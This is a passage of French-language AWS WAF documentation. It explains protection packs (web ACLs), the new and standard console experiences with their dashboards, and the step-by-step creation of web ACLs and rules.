Vous devez créer tout pack de protection (ACL Web) que vous souhaitez associer à une application Amplify dans la région mondiale CloudFront . Vous avez peut-être déjà un pack de protection régional (ACL Web) dans votre ordinateur Compte AWS, mais il n'est pas compatible avec Amplify.

Le pack de protection (ACL Web) et toutes les autres AWS WAF ressources qu'il utilise doivent se trouver dans la même région que les ressources protégées. Lors de la surveillance et de la gestion des requêtes Web pour une ressource régionale protégée, AWS WAF conserve toutes les données dans la même région que la ressource protégée. 

**Restrictions relatives aux associations de ressources multiples**  
Vous pouvez associer un pack de protection unique (ACL Web) à une ou plusieurs AWS ressources, avec les restrictions suivantes :
+ Vous ne pouvez associer chaque AWS ressource qu'à un seul pack de protection (ACL Web). La relation entre le pack de protection (ACL Web) et AWS les ressources est one-to-many. 
+ Vous pouvez associer un pack de protection (ACL Web) à une ou plusieurs CloudFront distributions. Vous ne pouvez associer un pack de protection (ACL Web) que vous avez associé à une CloudFront distribution à aucun autre type de AWS ressource.

# Utilisation de l'expérience de console mise à jour
<a name="working-with-console"></a>

 AWS WAF propose deux options d'utilisation de la console :

 La **nouvelle console** vise à simplifier le processus de configuration des ACL Web requis par les flux de travail de console standard. Vous pouvez utiliser des flux de travail guidés pour simplifier le processus de création et de gestion des ACL Web grâce à un pack de protection (ACL Web). Un pack de protection (ACL Web) facilite l'utilisation et la gestion du Web ACLs dans la console, mais n'est pas différent d'un ACL Web sur le plan fonctionnel. Outre l'amélioration du processus de configuration de la protection, la nouvelle console offre une meilleure visibilité de vos protections grâce à des tableaux de bord de sécurité, ce qui facilite le suivi de votre niveau de sécurité au sein de la AWS WAF console. 

 La ** AWS WAF console standard** fournit une approche traditionnelle pour configurer les protections par pare-feu des applications Web à l'aide du Web ACLs. Il offre un contrôle granulaire des règles individuelles et des groupes de règles et est familier aux AWS WAF utilisateurs existants. Cette console vous permet de contrôler en détail vos configurations de protection, ce qui permet de personnaliser précisément vos paramètres de sécurité. 

**Astuce**  
 Choisissez l'expérience console qui répond le mieux à vos besoins. Si vous débutez AWS WAF ou si vous souhaitez commencer à configurer les protections en fonction AWS des recommandations, nous vous recommandons de commencer par la nouvelle expérience de console. Toutefois, l'expérience standard peut toujours être ouverte depuis le volet de navigation de la console. 

## Égalité des fonctionnalités entre la nouvelle expérience de console et l'expérience standard
<a name="feature-parity"></a>

La nouvelle expérience de console maintient la parité complète des fonctionnalités avec la console existante tout en introduisant de nouvelles fonctionnalités :
+ Toutes les AWS WAF fonctionnalités existantes restent disponibles
+ Visibilité améliorée grâce à des tableaux de bord unifiés
+ Workflows de configuration simplifiés
+ Nouveaux modèles de pack de protection (ACL Web)

**Important**  
La nouvelle expérience de console utilise la même expérience WAFv2 APIs que celle de la console existante. Cela signifie que les packs de protection créés dans la nouvelle console sont implémentés en tant que WAFv2 site Web standard ACLs au niveau de l'API.

## Principales différences
<a name="key-differences"></a>


**Comparaison des expériences sur console**  

| Fonctionnalité | Expérience précédente AWS WAF sur console | Expérience de console mise à jour | 
| --- | --- | --- | 
| Processus de configuration | Flux de travail multipage | Interface d'une seule page | 
| Configuration d’une règle | Création de règles individuelles | Option pour les packs de protection préconfigurés | 
| Contrôle | Tableaux de bord séparés | Visibilité unifiée, y compris l'analyse du trafic par IA | 

## Comprendre les nouveaux tableaux de bord
<a name="understanding-new-dashboard"></a>

Les tableaux de bord disponibles via new offrent une visibilité unifiée de votre posture de sécurité grâce aux visualisations suivantes :

**Recommandations relatives aux informations sur le trafic** — AWS Threat Intelligence surveille le trafic autorisé des deux dernières semaines, analyse les vulnérabilités et fournit les informations suivantes :  
+ Suggestions de règles basées sur le trafic
+ Recommandations de sécurité spécifiques aux applications
+ Conseils pour l'optimisation de la protection

**Résumé** — Affiche le nombre de demandes pour l'ensemble du trafic pendant une période spécifiée. Vous pouvez utiliser les critères suivants pour filtrer les données de trafic :  
+ **Règle** : filtrez selon les règles individuelles du pack de protection.
+ **Actions** : affiche le nombre d'actions spécifiques prises sur le trafic, telles que Autoriser, Bloquer, Captcha et Défi.
+ **Type de trafic** : affiche uniquement les chiffres pour des types de trafic spécifiques, tels que les DDo anti-S ou les bots.
+ **Plage de temps** : choisissez parmi une sélection de plages de temps prédéfinies ou définissez une plage personnalisée. 
+ **Heure locale ou UTC** — Vous pouvez définir le format horaire de votre choix.

**Analyse du trafic basé sur l'IA** — Fournit une visibilité complète sur l'activité des robots et agents IA :  
+ **Identification** du bot : noms des robots, organisations et statut de vérification.
+ **Analyse des intentions** — Objectifs et modèles de comportement des agents de l'IA.
+ **Modèles d'accès** : points de terminaison et points de terminaison URLs les plus fréquemment consultés.
+ **Tendances temporelles** — Schémas d'activité par heure de la journée et tendances historiques (0 à 14 jours).
+ **Caractéristiques du trafic** : volume, distribution et détection des anomalies pour le trafic IA.

**Activité de protection** : visualise vos règles de protection et la manière dont leur ordre contribue à mettre fin aux actions.  
+ **Flux de trafic selon vos règles** : affichez le flux de trafic selon vos règles. Passez de la vue des **règles séquentielles à la vue** des **règles non séquentielles pour voir** comment l'ordre des règles affecte les résultats.
+ **Actions liées aux règles et leurs résultats** : affiche les actions de résiliation effectuées par une règle sur le trafic au cours de la période spécifiée. 

**Total des actions** : graphique qui permet de visualiser le nombre total d'actions effectuées sur les demandes pendant une période spécifiée. Utilisez l'option **Superposer les 3 dernières heures** pour comparer la plage horaire actuelle avec la fenêtre horaire de 3 heures précédente. Vous pouvez filtrer les données selon les critères suivants :   
+ **Autoriser l'action**
+ **Nombre total d'actions**
+ **Actions liées au captcha**
+ **Actions de défi**
+ **Actions de blocage**

**Toutes les règles** : graphique qui visualise les indicateurs de toutes les règles du pack de protection.  
+  Utilisez l'option **Superposer les 3 dernières heures** pour comparer la plage horaire actuelle avec la fenêtre horaire de 3 heures précédente.

**Tableau de bord de présentation** : fournit une vue graphique complète de l'état de votre sécurité, y compris les éléments suivants :  
+ **Caractéristiques du trafic** — Consultez un aperçu du trafic par origine, par type d'attaque ou par type d'appareil des clients qui ont envoyé des demandes.
+ **Caractéristiques des règles** — Répartition des attaques selon les 10 règles les plus courantes et les actions de fin.
+ **Bots** : visualisez l'activité, la détection, les catégories et les étiquettes de signaux associées aux robots.
+ **Anti- DDo S** — Vue d'ensemble de l'activité de la couche 7 DDo S détectée et atténuée.

# Configuration de la protection dans AWS WAF
<a name="web-acl"></a>

Cette page explique ce que sont les packs de protection (Web ACLs) et comment ils fonctionnent.

 Un pack de protection (ACL Web) vous permet de contrôler avec précision toutes les requêtes Web HTTP (S) auxquelles répond votre ressource protégée. Vous pouvez protéger les ressources Amazon CloudFront, Amazon API Gateway, Application Load Balancer AWS AppSync, Amazon Cognito AWS App Runner AWS Amplify, CloudWatch Amazon AWS et Verified Access.

Vous pouvez utiliser des critères tels que les suivants pour autoriser ou bloquer les demandes : 
+ Origine de l'adresse IP de la demande
+ Pays d'origine de la demande
+ Correspondance de chaîne ou expression régulière (regex) dans une partie de la demande
+ Taille d'une partie particulière de la demande
+ Détection de code SQL ou scripts malveillants 

Vous pouvez également tester n'importe quelle combinaison de ces conditions. Vous pouvez bloquer ou compter les requêtes Web qui non seulement répondent aux conditions spécifiées, mais qui dépassent également un certain nombre de demandes en une minute. Vous pouvez combiner des conditions à l'aide d'opérateurs logiques. Vous pouvez également exécuter des puzzles CAPTCHA et des défis de session client silencieux en réponse à des demandes. 

Vous indiquez vos critères de correspondance et les mesures à prendre en cas de correspondance dans les déclarations de AWS WAF règles. Vous pouvez définir des instructions de règles directement dans votre pack de protection (ACL Web) et dans les groupes de règles réutilisables que vous utilisez dans votre pack de protection (ACL Web). Pour une liste complète des options, reportez-vous aux sections [Utilisation d'instructions de règle dans AWS WAF](waf-rule-statements.md) et[Utilisation des actions liées aux règles dans AWS WAF](waf-rule-action.md).

Lorsque vous créez un pack de protection (ACL Web), vous spécifiez les types de ressources avec lesquels vous souhaitez l'utiliser. Pour plus d'informations, consultez [Création d'un pack de protection (ACL Web) dans AWS WAF](web-acl-creating.md). Après avoir défini un pack de protection (ACL Web), vous pouvez l'associer à vos ressources pour commencer à les protéger. Pour de plus amples informations, veuillez consulter [Associer ou dissocier une protection à une ressource AWS](web-acl-associating-aws-resource.md). 

**Note**  
Dans certains cas, une erreur interne AWS WAF peut retarder la réponse aux AWS ressources associées quant à l'autorisation ou au blocage d'une demande. Dans ces cas, il autorise CloudFront généralement la demande ou diffuse le contenu, tandis que les services régionaux refusent généralement la demande et ne diffusent pas le contenu.

**Risque lié au trafic de production**  
Avant de déployer des modifications dans votre pack de protection (ACL Web) pour le trafic de production, testez-les et ajustez-les dans un environnement intermédiaire ou de test jusqu'à ce que vous soyez à l'aise avec l'impact potentiel sur votre trafic. Testez et ajustez ensuite vos règles mises à jour en mode décompte avec votre trafic de production avant de les activer. Pour de plus amples informations, consultez [Tester et ajuster vos AWS WAF protections](web-acl-testing.md).

**Note**  
L'utilisation de plus de 1 500 unités WCUs dans un pack de protection (ACL Web) entraîne des coûts supérieurs au prix du pack de protection de base (ACL Web). Pour plus d'informations, veuillez consulter les sections [Unités de capacité Web ACL (WCUs) en AWS WAF](aws-waf-capacity-units.md) et [Tarification d'AWS WAF](https://aws.amazon.com/waf/pricing/).

**Incohérences temporaires lors des mises à jour**  
Lorsque vous créez ou modifiez un pack de protection (ACL Web) ou d'autres AWS WAF ressources, les modifications mettent peu de temps à se propager à toutes les zones où les ressources sont stockées. Le temps de propagation peut aller de quelques secondes à plusieurs minutes. 

Voici des exemples d'incohérences temporaires que vous pourriez remarquer lors de la propagation des modifications : 
+ Après avoir créé un pack de protection (ACL Web), si vous essayez de l'associer à une ressource, vous pouvez obtenir une exception indiquant que le pack de protection (ACL Web) n'est pas disponible. 
+ Une fois que vous avez ajouté un groupe de règles à un pack de protection (ACL Web), les nouvelles règles du groupe de règles peuvent être en vigueur dans une zone où le pack de protection (ACL Web) est utilisé et pas dans une autre.
+ Après avoir modifié un paramètre d'action d'une règle, vous pouvez voir l'ancienne action à certains endroits et la nouvelle action à d'autres. 
+ Après avoir ajouté une adresse IP à un ensemble d'adresses IP utilisé dans une règle de blocage, la nouvelle adresse peut être bloquée dans une zone alors qu'elle est toujours autorisée dans une autre.

**Topics**
+ [Création d'un pack de protection (ACL Web) dans AWS WAF](web-acl-creating.md)
+ [Modification d'un pack de protection (ACL Web) dans AWS WAF](web-acl-editing.md)
+ [Gestion du comportement des groupes de règles](web-acl-rule-group-settings.md)
+ [Associer ou dissocier une protection à une ressource AWS](web-acl-associating-aws-resource.md)
+ [Utilisation de packs de protection (Web ACLs) avec des règles et des groupes de règles dans AWS WAF](web-acl-processing.md)
+ [Configuration de l'action par défaut du pack de protection (ACL Web) dans AWS WAF](web-acl-default-action.md)
+ [Considérations relatives à la gestion de l'inspection corporelle dans AWS WAF](web-acl-setting-body-inspection-limit.md)
+ [Configuration du CAPTCHA, du défi et des jetons dans AWS WAF](web-acl-captcha-challenge-token-domains.md)
+ [Affichage des statistiques du trafic Web dans AWS WAF](web-acl-working-with.md)
+ [Supprimer un pack de protection (ACL Web)](web-acl-deleting.md)

# Création d'un pack de protection (ACL Web) dans AWS WAF
<a name="web-acl-creating"></a>

------
#### [ Using the new console ]

Cette section décrit les procédures de création de packs de protection (Web ACLs) via la nouvelle AWS console. 

Pour créer un nouveau pack de protection (ACL Web), utilisez l'assistant de création du pack de protection (ACL Web) en suivant la procédure décrite sur cette page. 

**Risque lié au trafic de production**  
Avant de déployer des modifications dans votre pack de protection (ACL Web) pour le trafic de production, testez-les et ajustez-les dans un environnement intermédiaire ou de test jusqu'à ce que vous soyez à l'aise avec l'impact potentiel sur votre trafic. Testez et ajustez ensuite vos règles mises à jour en mode décompte en fonction de votre trafic de production avant de les activer. Pour de plus amples informations, consultez [Tester et ajuster vos AWS WAF protections](web-acl-testing.md).

**Note**  
L'utilisation de plus de 1 500 unités WCUs dans un pack de protection (ACL Web) entraîne des coûts supérieurs au prix du pack de protection de base (ACL Web). Pour plus d'informations, veuillez consulter les sections [Unités de capacité Web ACL (WCUs) en AWS WAF](aws-waf-capacity-units.md) et [Tarification d'AWS WAF](https://aws.amazon.com/waf/pricing/).

1. Connectez-vous à la nouvelle version AWS Management Console et ouvrez la AWS WAF console à l'adresse [https://console.aws.amazon.com/wafv2-pro.](https://console.aws.amazon.com/wafv2-pro) 

1. Dans le volet de navigation, sélectionnez **Resources & protection packs (web ACLs)**.

1. Sur la page **Ressources et packs de protection (Web ACLs)**, choisissez **Ajouter un pack de protection (ACL Web)**.

1. Sous **Parlez-nous de votre application**, dans **Catégorie d'applications**, sélectionnez une ou plusieurs catégories d'applications.

1. Pour **Source de trafic**, choisissez le type de trafic avec lequel l'application interagit : **API**, **Web** ou **API et Web à la fois**.

1. Sous **Ressources à protéger,** choisissez **Ajouter des ressources**.

1. Choisissez la catégorie de AWS ressource que vous souhaitez associer à ce pack de protection (ACL Web), qu'il s'agisse de CloudFront distributions Amazon ou de ressources régionales. Pour de plus amples informations, veuillez consulter [Associer ou dissocier une protection à une ressource AWS](web-acl-associating-aws-resource.md). 

1. Sous **Choisir les protections initiales,** sélectionnez votre niveau de protection préféré : **recommandé**, **essentiel** ou **vous le créez**. 

1. (Facultatif) Si vous choisissez **Vous le créez**, établissez vos règles.

   1. (Facultatif) Si vous souhaitez ajouter votre propre règle, sur la page **Ajouter des règles**, sélectionnez **Règle personnalisée**, puis **Suivant**.

      1. Choisissez le type de règle.

      1. Dans **Action**, sélectionnez l'action que la règle doit effectuer lorsqu'elle correspond à une demande web. Pour de plus amples informations sur vos choix, veuillez consulter [Utilisation des actions liées aux règles dans AWS WAF](waf-rule-action.md) et [Utilisation de packs de protection (Web ACLs) avec des règles et des groupes de règles dans AWS WAF](web-acl-processing.md).

         Si vous utilisez l'**Challenge**action **CAPTCHA**ou, ajustez la configuration du **temps d'immunité** en fonction des besoins de la règle. Si vous ne spécifiez pas le paramètre, la règle hérite du pack de protection (ACL Web). Pour modifier les paramètres de durée d'immunité du pack de protection (ACL Web), modifiez le pack de protection (ACL Web) après l'avoir créé. Pour plus d'informations sur les durées d'immunité, consultez[Configuration de l'expiration de l'horodatage et de la durée d'immunité des jetons dans AWS WAF](waf-tokens-immunity-times.md).
**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez l'action CAPTCHA ou la Challenge règle dans l'une de vos règles ou en tant que dérogation d'action de règle dans un groupe de règles. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

         Si vous souhaitez personnaliser la demande ou la réponse, choisissez les options correspondantes et renseignez les détails de votre personnalisation. Pour de plus amples informations, veuillez consulter [Demandes et réponses Web personnalisées dans AWS WAF](waf-custom-request-response.md).

         Si vous souhaitez que votre règle ajoute des étiquettes aux requêtes Web correspondantes, choisissez les options correspondantes et renseignez les détails de votre étiquette. Pour de plus amples informations, veuillez consulter [Étiquetage des requêtes Web dans AWS WAF](waf-labels.md).

      1. Dans la zone **Nom**, entrez le nom que vous souhaitez utiliser pour identifier cette règle. N'utilisez pas de noms commençant par `AWS``Shield`,`PreFM`, ou`PostFM`. Ces chaînes sont réservées ou peuvent prêter à confusion avec les groupes de règles gérés pour vous par d'autres services.

      1. Entrez la définition de votre règle, en fonction de vos besoins. Vous pouvez combiner des règles dans des instructions logiques `AND` et des instructions de `OR` règles. L'Assistant vous guide à travers les options de chaque règle, en fonction du contexte. Pour de plus amples informations sur les options de vos règles, reportez-vous à la section [AWS WAF règles](waf-rules.md). 

      1. Choisissez **Créer une règle**.
**Note**  
Si vous ajoutez plusieurs règles à un pack de protection (ACL Web), AWS WAF évalue les règles dans l'ordre dans lequel elles sont répertoriées pour le pack de protection (ACL Web). Pour de plus amples informations, veuillez consulter [Utilisation de packs de protection (Web ACLs) avec des règles et des groupes de règles dans AWS WAF](web-acl-processing.md).

   1. (Facultatif) Si vous souhaitez ajouter des groupes de règles gérés, sur la page **Ajouter des règles**, choisissez **AWS-managed rule group** ou **AWS Marketplace rule group**, puis choisissez **Next**. Pour chaque groupe de règles gérées que vous souhaitez ajouter, procédez comme suit :

      1. Sur la page **Ajouter des règles**, développez la liste pour les groupes de règles AWS gérés ou pour le AWS Marketplace vendeur.

      1. Choisissez la version du groupe de règles.

      1. Pour personnaliser la façon dont votre pack de protection (ACL Web) utilise le groupe de règles, choisissez **Modifier**. Les paramètres de personnalisation courants sont les suivants : 
         + **Réduisez la portée des requêtes Web inspectées par le groupe de règles en ajoutant une instruction scope-down dans la section Inspection.** Pour de plus amples informations sur cette option, veuillez consulter [Utilisation d'instructions scope-down dans AWS WAF](waf-rule-scope-down-statements.md).
         + Remplacez les actions des règles pour certaines ou toutes les règles dans **Rule overrides**. Si vous ne définissez pas d'action de remplacement pour une règle, l'évaluation utilise l'action de règle définie au sein du groupe de règles. Pour de plus amples informations sur cette option, veuillez consulter [Remplacer les actions du groupe de règles dans AWS WAF](web-acl-rule-group-override-options.md). 
         + Certains groupes de règles gérés nécessitent que vous fournissiez une configuration supplémentaire. Consultez la documentation de votre fournisseur de groupes de règles gérés. Pour obtenir des informations spécifiques aux groupes de règles AWS gérées, consultez[AWS Règles gérées pour AWS WAF](aws-managed-rule-groups.md). 

      1. Choisissez **Suivant**.

   1. (Facultatif) Si vous souhaitez ajouter votre propre groupe de règles, sur la page **Ajouter des règles**, choisissez **Groupe de règles personnalisé**, puis **Suivant**. Pour chaque groupe de règles que vous souhaitez ajouter, procédez comme suit :

      1. Dans **Nom**, entrez le nom que vous souhaitez utiliser pour la règle du groupe de règles dans ce pack de protection (ACL Web). N'utilisez pas de noms commençant par `AWS``Shield`,`PreFM`, ou`PostFM`. Ces chaînes sont réservées ou peuvent prêter à confusion avec les groupes de règles gérés pour vous par d'autres services. Consultez [Reconnaissance des groupes de règles fournis par d'autres services](waf-service-owned-rule-groups.md). 

      1. Choisissez votre groupe de règles dans la liste. 

      1. (Facultatif) Sous **Configuration des règles**, choisissez une **dérogation aux règles**. Vous pouvez remplacer les actions des règles par n'importe quel paramètre d'action valide, comme vous pouvez le faire pour les groupes de règles gérés.

      1. (Facultatif) Sous **Ajouter des étiquettes**, choisissez **Ajouter une étiquette**, puis entrez les étiquettes que vous souhaitez ajouter aux demandes conformes à la règle. Les règles qui sont évaluées ultérieurement dans le même pack de protection (ACL Web) peuvent faire référence aux étiquettes ajoutées par cette règle.

      1. Choisissez **Créer une règle**.

1. Sous **Nom et description**, entrez le nom de votre pack de protection (ACL Web). Entrez éventuellement une description.
**Note**  
Vous ne pouvez pas modifier le nom après avoir créé le pack de protection (ACL Web).

1. (Facultatif) Sous **Personnaliser le pack de protection (ACL Web)**, configurez les actions de règles par défaut, les configurations et la destination de journalisation :

   1. (Facultatif) Sous **Actions de règle par défaut**, choisissez l'action par défaut pour le pack de protection (ACL Web). Il s'agit de l'action qui AWS WAF exécute une demande lorsque les règles du pack de protection (ACL Web) n'effectuent aucune action explicite. Pour de plus amples informations, veuillez consulter [Demandes et réponses Web personnalisées dans AWS WAF](waf-custom-request-response.md).

   1. (Facultatif) Sous Configuration des règles, personnalisez les paramètres des règles du pack de protection (ACL Web) :
      + **Limites de débit par défaut** : définissez des limites de débit pour bloquer les attaques par déni de service (DoS) susceptibles d'affecter la disponibilité, de compromettre la sécurité ou de consommer des ressources excessives. Cette règle bloque les demandes par adresse IP qui dépassent le débit autorisé pour votre application. Pour de plus amples informations, consultez [Utilisation d'instructions de règles basées sur le taux dans AWS WAF](waf-rule-statement-type-rate-based.md).
      + **Adresses IP** - Entrez les adresses IP à bloquer ou à autoriser. Ce paramètre remplace les autres règles.
      + **Origines spécifiques au pays** : bloquez les demandes provenant de pays spécifiques ou comptez tout le trafic.

   1. Pour **Destination de journalisation**, configurez le type de destination de journalisation et l'emplacement de stockage des journaux. Pour de plus amples informations, veuillez consulter [AWS WAF destinations de journalisation](logging-destinations.md).

1. Vérifiez vos paramètres et choisissez **Ajouter un pack de protection (ACL Web)**.

------
#### [ Using the standard console ]

Cette section décrit les procédures de création de sites Web ACLs via la AWS console. 

Pour créer une nouvelle ACL Web, utilisez l'assistant de création d'une ACL Web en suivant la procédure décrite sur cette page. 

**Risque lié au trafic de production**  
Avant de déployer des modifications dans votre ACL Web pour le trafic de production, testez-les et ajustez-les dans un environnement intermédiaire ou de test jusqu'à ce que vous soyez à l'aise avec l'impact potentiel sur votre trafic. Testez et ajustez ensuite vos règles mises à jour en mode décompte en fonction de votre trafic de production avant de les activer. Pour de plus amples informations, consultez [Tester et ajuster vos AWS WAF protections](web-acl-testing.md).

**Note**  
L'utilisation de plus de 1 500 unités WCUs dans un pack de protection (ACL Web) entraîne des coûts supérieurs au prix du pack de protection de base (ACL Web). Pour plus d'informations, veuillez consulter les sections [Unités de capacité Web ACL (WCUs) en AWS WAF](aws-waf-capacity-units.md) et [Tarification d'AWS WAF](https://aws.amazon.com/waf/pricing/).

**Pour créer une liste ACL web**

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. Choisissez **Web ACLs** dans le volet de navigation, puis choisissez **Create Web ACL**.

1. Dans **Nom (Nom)**, entrez le nom que vous souhaitez utiliser pour identifier cette liste ACL web. 
**Note**  
Vous ne pouvez pas modifier le nom une fois que vous créez la liste ACL web.

1. (Facultatif) Pour **Description - facultatif**, entrez une description plus longue pour la liste ACL web si vous le souhaitez. 

1. Pour **CloudWatch metric name**, modifiez le nom par défaut le cas échéant. Suivez les instructions sur la console pour connaître les caractères valides. Le nom ne peut pas contenir de caractères spéciaux, d'espaces blancs ou de noms de métriques réservés AWS WAF, notamment « All » et « Default\$1Action ».
**Note**  
Vous ne pouvez pas modifier le nom de la CloudWatch métrique après avoir créé l'ACL Web.

1. Sous **Type de ressource**, choisissez la catégorie de AWS ressource que vous souhaitez associer à cette ACL Web, soit les CloudFront distributions Amazon, soit les ressources régionales. Pour de plus amples informations, veuillez consulter [Associer ou dissocier une protection à une ressource AWS](web-acl-associating-aws-resource.md).

1. Pour **Région**, si vous avez choisi un type de ressource régional, choisissez la région dans laquelle vous AWS WAF souhaitez stocker l'ACL Web. 

   Vous devez uniquement choisir cette option pour les types de ressources régionaux. Pour les CloudFront distributions, la région est codée en dur pour la région de l'est des États-Unis (Virginie du Nord)`us-east-1`, pour les applications Global (CloudFront).

1. (CloudFront, API Gateway, Amazon Cognito, App Runner et Verified Access) Pour la **limite de taille d'inspection des demandes Web, facultatif**, si vous souhaitez spécifier une autre limite de taille d'inspection corporelle, sélectionnez la limite. L'inspection d'une taille corporelle supérieure à 16 Ko par défaut peut entraîner des coûts supplémentaires. Pour de plus amples informations sur cette option, veuillez consulter [Considérations relatives à la gestion de l'inspection corporelle dans AWS WAF](web-acl-setting-body-inspection-limit.md). 

1. (Facultatif) Pour les ** AWS ressources associées : facultatif**. Si vous souhaitez spécifier vos ressources maintenant, choisissez **Ajouter AWS des ressources**. Dans la boîte de dialogue, choisissez les ressources que vous souhaitez associer, puis cliquez sur **Ajouter**. AWS WAF vous renvoie à la page **Describe Web ACL et aux AWS ressources associées**.
**Note**  
Lorsque vous choisissez d'associer un Application Load Balancer à votre ACL Web, la protection ** DDoS au niveau des ressources** est activée. Pour de plus amples informations, veuillez consulter [AWS WAF Prévention du déni de service distribué (DDoS)](waf-anti-ddos.md).

1. Choisissez **Suivant**.

1. (Facultatif) Si vous souhaitez ajouter des groupes de règles gérées, dans la page **Ajouter des règles et des groupes de règles**, choisissez **Ajouter des règles**, puis **Ajouter des groupes de règles gérées**. Pour chaque groupe de règles gérées que vous souhaitez ajouter, procédez comme suit :

   1. Sur la page **Ajouter des groupes de règles gérés**, développez la liste des groupes de règles AWS gérés ou du AWS Marketplace vendeur de votre choix.

   1. Pour le groupe de règles que vous souhaitez ajouter, dans la colonne **Action**, activez le bouton **Ajouter à l'ACL Web**. 

      Pour personnaliser la façon dont votre ACL Web utilise le groupe de règles, choisissez **Modifier**. Les paramètres de personnalisation courants sont les suivants : 
      + Remplacez les actions des règles pour certaines ou toutes les règles. Si vous ne définissez pas d'action de remplacement pour une règle, l'évaluation utilise l'action de règle définie au sein du groupe de règles. Pour de plus amples informations sur cette option, veuillez consulter [Remplacer les actions du groupe de règles dans AWS WAF](web-acl-rule-group-override-options.md). 
      + Réduisez la portée des requêtes Web inspectées par le groupe de règles en ajoutant une instruction scope-down. Pour de plus amples informations sur cette option, veuillez consulter [Utilisation d'instructions scope-down dans AWS WAF](waf-rule-scope-down-statements.md).
      + Certains groupes de règles gérés nécessitent que vous fournissiez une configuration supplémentaire. Consultez la documentation de votre fournisseur de groupes de règles gérés. Pour obtenir des informations spécifiques aux groupes de règles AWS gérées, consultez[AWS Règles gérées pour AWS WAF](aws-managed-rule-groups.md). 

      Lorsque vous avez terminé de définir vos paramètres, choisissez **Enregistrer la règle**.

   Choisissez **Ajouter des règles** pour terminer l'ajout de règles gérées et revenir à la page **Ajouter des règles et des groupes de règles**.
**Note**  
Si vous ajoutez plusieurs règles à une ACL Web, AWS WAF évalue les règles dans l'ordre dans lequel elles sont répertoriées pour l'ACL Web. Pour de plus amples informations, veuillez consulter [Utilisation de packs de protection (Web ACLs) avec des règles et des groupes de règles dans AWS WAF](web-acl-processing.md).

1. (Facultatif) Si vous souhaitez ajouter votre propre groupe de règles, sur la page **Ajouter des règles et des groupes de règles**, choisissez **Ajouter des règles**, puis **Ajouter mes propres règles et groupes de règles**. Pour chaque groupe de règles que vous souhaitez ajouter, procédez comme suit :

   1. Sur la page **Ajouter mes propres règles et groupes de règles** choisissez **Groupe de règles**.

   1. Dans **Nom**, entrez le nom que vous souhaitez utiliser pour la règle de groupe de règles dans cette ACL Web. N'utilisez pas de noms commençant par `AWS``Shield`,`PreFM`, ou`PostFM`. Ces chaînes sont réservées ou peuvent prêter à confusion avec les groupes de règles gérés pour vous par d'autres services. Consultez [Reconnaissance des groupes de règles fournis par d'autres services](waf-service-owned-rule-groups.md). 

   1. Choisissez votre groupe de règles dans la liste. 
**Note**  
Si vous souhaitez annuler les actions des règles pour un groupe de règles qui vous est propre, enregistrez-le d'abord dans l'ACL Web, puis modifiez l'ACL Web et la déclaration de référence du groupe de règles dans la liste des règles de l'ACL Web. Vous pouvez remplacer les actions des règles par n'importe quel paramètre d'action valide, comme vous pouvez le faire pour les groupes de règles gérés.

   1. Choisissez **Ajouter une règle**.

1. (Facultatif) Si vous souhaitez ajouter votre propre règle, sur la page **Ajouter des règles et des groupes de règles**, choisissez **Ajouter des règles**, **Ajouter mes propres règles et groupes de règles**, **Générateur de règles**, puis **Éditeur visuel de règles**. 
**Note**  
L'**éditeur visuel de règles** de la console prend en charge un niveau d'imbrication. Par exemple, vous pouvez utiliser une seule instruction logique `AND` ou une seule `OR` instruction et y imbriquer un niveau d'autres instructions, mais vous ne pouvez pas imbriquer des instructions logiques dans des instructions logiques. Pour gérer des instructions de règle plus complexes, utilisez l'**éditeur JSON de règles**. Pour de plus amples informations sur toutes les options des règles, reportez-vous à la section [AWS WAF règles](waf-rules.md).   
Cette procédure couvre l'**éditeur visuel de règles**. 

   1. Dans la zone **Nom**, entrez le nom que vous souhaitez utiliser pour identifier cette règle. N'utilisez pas de noms commençant par `AWS``Shield`,`PreFM`, ou`PostFM`. Ces chaînes sont réservées ou peuvent prêter à confusion avec les groupes de règles gérés pour vous par d'autres services.

   1. Entrez la définition de votre règle, en fonction de vos besoins. Vous pouvez combiner des règles dans des instructions logiques `AND` et des instructions de `OR` règles. L'Assistant vous guide à travers les options de chaque règle, en fonction du contexte. Pour de plus amples informations sur les options de vos règles, reportez-vous à la section [AWS WAF règles](waf-rules.md). 

   1. Dans **Action**, sélectionnez l'action que la règle doit effectuer lorsqu'elle correspond à une demande web. Pour de plus amples informations sur vos choix, veuillez consulter [Utilisation des actions liées aux règles dans AWS WAF](waf-rule-action.md) et [Utilisation de packs de protection (Web ACLs) avec des règles et des groupes de règles dans AWS WAF](web-acl-processing.md).

      Si vous utilisez l'**Challenge**action **CAPTCHA**ou, ajustez la configuration du **temps d'immunité** en fonction des besoins de la règle. Si vous ne spécifiez pas le paramètre, la règle hérite de l'ACL Web. Pour modifier les paramètres de durée d'immunité de l'ACL Web, modifiez l'ACL Web après l'avoir créée. Pour plus d'informations sur les durées d'immunité, consultez[Configuration de l'expiration de l'horodatage et de la durée d'immunité des jetons dans AWS WAF](waf-tokens-immunity-times.md).
**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez l'action CAPTCHA ou la Challenge règle dans l'une de vos règles ou en tant que dérogation d'action de règle dans un groupe de règles. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

      Si vous souhaitez personnaliser la demande ou la réponse, choisissez les options correspondantes et renseignez les détails de votre personnalisation. Pour de plus amples informations, veuillez consulter [Demandes et réponses Web personnalisées dans AWS WAF](waf-custom-request-response.md).

      Si vous souhaitez que votre règle ajoute des étiquettes aux requêtes Web correspondantes, choisissez les options correspondantes et renseignez les détails de votre étiquette. Pour de plus amples informations, veuillez consulter [Étiquetage des requêtes Web dans AWS WAF](waf-labels.md).

   1. Choisissez **Ajouter une règle**.

1. Choisissez l'action par défaut pour l'ACL Web, Block soitAllow. Il s'agit de l'action qui AWS WAF exécute une demande lorsque les règles de l'ACL Web ne l'autorisent ou ne la bloquent pas explicitement. Pour de plus amples informations, veuillez consulter [Configuration de l'action par défaut du pack de protection (ACL Web) dans AWS WAF](web-acl-default-action.md).

